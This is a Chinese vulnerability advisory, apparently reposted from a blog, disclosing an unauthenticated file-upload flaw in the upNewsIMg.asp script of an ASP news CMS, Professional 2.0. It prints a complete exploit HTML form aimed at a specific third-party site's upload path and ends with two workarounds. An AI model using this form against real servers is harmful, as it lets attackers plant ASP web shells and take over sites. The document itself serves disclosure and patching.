大志网站内容管理系统Professional 2.0漏洞

简介:
信息来源: [url]www.neeao.com[/url]

漏洞发现:Neeao
程序名称:大志网站内容管理系统
漏洞版本:Professional 2.0 bulid 20040905 
系统开发:大志工作室 
官方地址:_blank> [url]http://www.wytg.net/[/url]
漏洞说明:上传漏洞

程序说明:是基于ASP开发的一套网络新闻文章管理系统,从首页、类别网页(包括类别分页)一直到文章阅读页面,自动生成
全静态HTML页面!

漏洞描述:其所使用的上传新闻图片文件upNewsIMg.asp,没有对上传文件后缀做判断,导致可以直接上传asp文件。
更重要的是,在这个文件中没有给出权限验证,可以直接利用本文件上传Asp文件!

利用方法:构造一个提交表单即可上传asp文件!如下:
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <html>
<head>
<title>文件上传</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="_blank> [url]http://www.xbgqxx.com/upload/upNewsIMg.asp[/url] " enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>图片上传</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<script language="javascript">
  function setid()
  {
  str='<br>';
  if(!window.form1.upcount.value)
  window.form1.upcount.value=2;
  if(window.form1.upcount.value>100){
  alert("您最多只能同时上传100个文件0");
  window.form1.upcount.value = 100;
  setid();
  }
  else{
  for(i=1;i<=window.form1.upcount.value;i++)
  str+='<div align="left">待传图片'+i+':<input type="file" name="file'+i+'" style="width:200" class="tx1"></div>';
  window.upid.innerHTML=str+'<br>';}
  }
  </script>
上传个数: 
<input type="text" class="tx" value="2" name="upcount" size="20">
<input type="button" name="Button" class="bt" value="· 设定 ·">

</td>
</tr>
<tr align="center" valign="middle">
<td align="left" id="upid" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· 提交 ·" class="bt">
<input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"> </td>
</tr>
</table>
</center>
</div>
</form>

</body>

</html> 


厂商补丁:暂时没有

临时解决方法:
1、在文件upNewsIMg.asp加入:
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <!--#i nclude FILE="../admin/check.asp"--> 

限制一般会员的权限,禁止其使用上传功能。

2、直接删除这个文件!


















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8582 ,如需转载请自行联系原作者


相关文章
|
安全
CNVD-2021-49104——泛微E-Office文件上传漏洞
CNVD-2021-49104——泛微E-Office文件上传漏洞
485 1
CNVD-2021-49104——泛微E-Office文件上传漏洞
|
11月前
|
开发框架 安全 JavaScript
记一次web登录通杀渗透测试到GETSHELL——续篇
记一次web登录通杀渗透测试到GETSHELL——续篇
139 0
|
安全 PHP
Joomla 4.2.7 安全和漏洞修复发布(六翼开源)
Joomla 4.2.7 现已推出。这是 Joomla 4.x 系列的安全和错误修复版本。Joomla 4.2.7 共解决了 103 个问题
Joomla 4.2.7 安全和漏洞修复发布(六翼开源)
|
PHP 开发工具 数据库
Windows 下安装开源自媒体内容管理系统 MyCms
Windows 下安装开源自媒体内容管理系统 MyCms
209 0
Windows 下安装开源自媒体内容管理系统 MyCms
|
安全 测试技术 Shell
网站渗透测试报告速写模板指南
网站渗透测试服务在给客户写报告模板或者检查表的时候,应逐步完善。写报告在渗透测试中耗费大量的时间和精力。花费的时间取决于客户和经理期望的交付成果。(中文大概意思是客户和老板能不能看懂你的报告)奖励项目报告通常比渗透测试报告短,但是无论什么格式,您都将受益于为每个文档和测试类型创建模板(黑盒、白盒、Web、网络、wifi)。
362 0
网站渗透测试报告速写模板指南
|
安全 测试技术 网络安全
网站渗透测试服务项目内容详情
小小白承包了一块20亩的土地,依山傍水,风水不错。听朋友说去年玉米大卖,他也想尝尝甜头,也就种上了玉米。 看着玉米茁壮成长,别提小小白心里多开心,心里盘算着玉米大买后,吃香喝辣的富贵生活。 好景不长,小小白这几天发现玉米长得慢了,还出现了黄叶,黄页面积还有扩大的趋势。
1621 0
|
缓存 安全
开源内容管理系统 Joomla CMS 3.9.10发布
Joomla 3.9.10现已推出。这是针对3.x系列Joomla的安全修复程序版本,它解决了一个安全漏洞,包含30多个错误修复和改进。 什么是3.9.10?Joomla 3.9.10包含一个安全漏洞修复程序和一些错误和改进,包括: 安全问题已修复低优先级 - 子窗体字段中的Core - Filter属性允许远程执行代码(影响Joomla 3.
900 0